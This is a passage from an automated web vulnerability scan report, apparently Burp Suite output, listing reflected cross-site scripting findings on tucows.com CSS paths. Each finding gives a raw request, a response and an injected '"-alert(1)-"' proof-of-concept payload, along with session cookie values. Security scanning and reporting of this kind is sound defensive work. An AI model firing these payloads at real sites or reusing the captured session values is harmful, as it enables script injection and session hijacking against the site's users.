Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images4e824"-alert(1)-"ef3735f6727/newassets/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.68. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5359"-alert(1)-"a9fa148b261 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetse5359"-alert(1)-"a9fa148b261/includes/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.69. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 175cb"-alert(1)-"c07ddec345e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes175cb"-alert(1)-"c07ddec345e/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.70. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bed4"-alert(1)-"bc0cdf6abcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes5bed4"-alert(1)-"bc0cdf6abcf/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.71. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7990"-alert(1)-"6641f3a44d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyf7990"-alert(1)-"6641f3a44d/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.72. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b53b3"-alert(1)-"2154049023 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.cssb53b3"-alert(1)-"2154049023";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.73. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 329b8"-alert(1)-"ca5ec70f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css?329b8"-alert(1)-"ca5ec70f733=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.74. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d20f"-alert(1)-"fab829ca50f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images6d20f"-alert(1)-"fab829ca50f/newassets/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.75. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b37a5"-alert(1)-"3c4c9d14a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb37a5"-alert(1)-"3c4c9d14a1d/includes/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.76. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.77. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

